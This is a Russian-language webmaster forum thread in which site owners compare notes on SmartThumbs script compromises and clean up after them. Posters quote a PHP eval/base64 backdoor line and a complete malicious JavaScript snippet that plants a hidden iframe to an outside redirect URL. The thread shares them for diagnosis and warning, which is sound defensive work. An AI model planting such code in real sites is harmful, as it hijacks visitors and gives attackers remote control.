Master-X
Форум | Новости | Статьи
Главная » Форум » CJs » 
Тема: SmartThumbs HACKED again
цитата
09/10/09 в 16:55
 MadDok
Soft-Com: я сделал проще, удалил каталог gals icon_smile.gif, похоже скрипт глюкал при названии папки p2.php_files, теперь он ничего не пишет и тем не менее @eval(base64_decode($_POST[qxp]));//'; появляется стабильно.

Последний раз редактировалось: MadDok (09/10/09 в 17:02), всего редактировалось 1 раз
цитата
09/10/09 в 16:59
 Darkest
на нескольких доменах на разных серверах нашел пустых юзеров. удалил, пропатчился. в variables.php ничего левого нету, flie check везде на все сказал ОК. но в /tmp на обоих серверах есть много пустых *ses.tmp
доктор, я здоров или таки поломали? поубивать все эти *ses.tmp и спать спокойно?
цитата
09/10/09 в 19:43
 Vyacheslav
Почти на 90% сайтов был пустой юзер, но кроме него ничего подозрительного не нашел..
Где именно этот /tmp? В корне самого сервака?
цитата
09/10/09 в 19:49
 fihorn


это директория в корне сервера
обычно юзеры, которые даются хостером - не имеют к ней доступа. если есть рут на сервере или свой админ - можно увидеть.

файлы в этой директории - сессии залогиненных веб-юзеров, например, вебмастеров, залогиненных в тгп-скрипт или ваши собственные в трейд-скриптах.
поэтому они появляются.

сами файлы с эксплойтом выглядят как
ses.tmp
ases.tmp
а вот те файлы, которые начинаются на ses и выглядят как ses_4534584583454.tmp - это и есть сессии залогиненных юзеров.
если их стереть - просто юзерам придется перелогиниться. в этом нет ничего критического по сути.
цитата
09/10/09 в 19:55
 Vyacheslav
Странно, но даже под рутом не смог удалить icon_sad.gif
ses.tmp
ases.tmp
..
В них какойто зазенденный код.

Еще есть куча в /tmp нулевого размера файлов
bses.tmp
cses.tmp
dses.tmp
...
xses.tmp
yses.tmp
это что такое?
цитата
09/10/09 в 22:50
 Soft-Com
это всё код трояна, который инклюдится при выполнении даже любого смартового скрипта - удаляй
цитата
09/10/09 в 23:29
 Vyacheslav
не удаляются, суки...
цитата
10/10/09 в 03:51
 fihorn

вообще это довольно дико, если под рутом они не удаляются.
у тебя точно полноценный дедик? может это джейл какой-нибудь? тогда надо пинать суппорт хостера
цитата
10/10/09 в 07:08
 Soft-Com
а можно это как-то увидеть?
цитата
10/10/09 в 08:44
 Darkest
У меня тоже не удалялись под рутом. Саппорт вебазиллы сказал: "Данные файлы удалять не стоит, это является временным средством защиты от взлома"
Удалять пытался уже после того как пропатчил смарты. Мож так и должно быть...
цитата
10/10/09 в 11:45
 Vyacheslav
fihorn! Я уверен, что у меня дедики!
Сапорт сказал примерно то же самое, что и Darkestу..
цитата
10/10/09 в 21:04
 morex
toge nashel u sebya
цитата
11/10/09 в 00:26
 Alex AWM
Админы могли сами создать пустые файлы, и повесить аттрибут immutable -- чтобы туда нельзя было записать код эксплойта. (У такого аттрибута приоритет выше чем у прав пользователей, хотя по идее рут должен их сносить). Или поставили на них права 000
цитата
12/10/09 в 08:59
 MadDok
yo: ну что, ты какнибудь сумел исправить эту проблему?
цитата
12/10/09 в 10:27
 fihorn
ну если вы под рутом не можете удалить файлы - то, скорее всего, нужно обратиться к суппорту хостера. если это вебазилла - то, наверное, ребята тоже участвуют в решении проблемы и знают, почему вдруг файлы стали неудаляемые.

вот Alex AWM написал же про пустые файлы и 000. это старая проверенная техника, работает.
цитата
16/01/10 в 13:02
 Perlover
Soft-Com писал:
пока еще не разобрался, но после взлома на сервере присутвуют 2 части скрипта:
1. в /tmp/ - судя по всему скрипт редиректа посетителя на урл http://itrxx.com/fr.php

Кто трейдит с DonKinky и его подругой Webmiss Lizzet, проверьте трейды с ними
У них точно такой же редирект вставляется при первом клике:
Код:
<body oncontextmenu='return false'><script>if(window.opener&&!window.opener.closed){var ifr=window.opener.document.createElement('iframe');ifr.src='http://itrxx.com/fr.php';ifr.style.visibility='hidden';ifr.style.position='absolute';window.opener.document.body.appendChild(ifr);}</script><script>window.name='qwnew';</script><script>window.location.reload();</script><meta http-equiv='refresh' content='1'>

То есть, на их сайтах (пример http://www.realitypictures.net/) кликаем - открывается окно с этим кодом. Оно, судя по коду, вставляет скрытый фрейм в opener - то есть в окно, которое открыло линк, то есть в сам сайт DonKinky, а затем себя перегружает (открывает галлеру/трейд). У меня нет сейчас аськи до понедельника, но если кто может, посодействуйте, чтобы они убрали это г....;-)
цитата
08/03/10 в 10:45
 perdola
у меня в thumbs есть странные файлы типа kgjsdkjsdjk.jpg но фишка в том что они открываются как картинки и это нормальные тумбы, но название отличается от других тумб в директории и так почти в каждой директории, это нормально?
цитата
08/03/10 в 13:20
 basta
нормально, названия тумб рандомом генерятся, мало ли что может получиться )
цитата
27/06/10 в 09:10
 weely6
а может и повториться icon_smile.gif
Стр. « первая   <  1, 2, 3, 4


Эта страница в полной версии